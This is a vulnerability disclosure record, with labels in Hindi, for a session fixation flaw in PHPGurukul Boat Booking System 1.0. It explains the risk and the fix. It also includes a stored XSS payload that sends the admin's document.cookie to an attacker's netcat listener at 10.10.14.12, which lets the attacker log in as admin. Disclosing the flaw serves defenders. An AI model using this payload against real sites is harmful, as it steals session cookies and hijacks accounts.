| शीर्षक | PHPGurukul Boat Booking System 1.0 Session Fixiation |
|---|
| विवरण | The session is being started (session_start()) without regenerating the session ID after login, which could expose the system to session fixation attacks. An attacker can force a session ID onto a victim and then hijack it after the victim logs in.
Risk: If an attacker gets hold of the session ID (via XSS or other means), they could hijack the session and impersonate the user.
Fix: After logging in, regenerate the session ID to prevent this attack.
Via injecting <script>var i=new Image(); i.src="http://10.10.14.12:1234/?cookie="+btoa(document.cookie);</script> payload to forms in book-boat.php, attacker can inject a XSS payload.
When admin user sign in to check on all-booking.php, payload will be triggered and admin cookie is forwarded to attacker's netcat listener, which can be used to login as the admin user without needing any credentials.
|
|---|
| स्रोत | ⚠️ https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md |
|---|
| उपयोगकर्ता | jadu101 (UID 70632) |
|---|
| सबमिशन | 17/10/2024 06:12 AM (2 साल पहले) |
|---|
| संयम | 18/10/2024 09:17 PM (2 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 280944 [PHPGurukul Boat Booking System 1.0 session_start कमजोर प्रमाणीकरण] |
|---|
| अंक | 20 |
|---|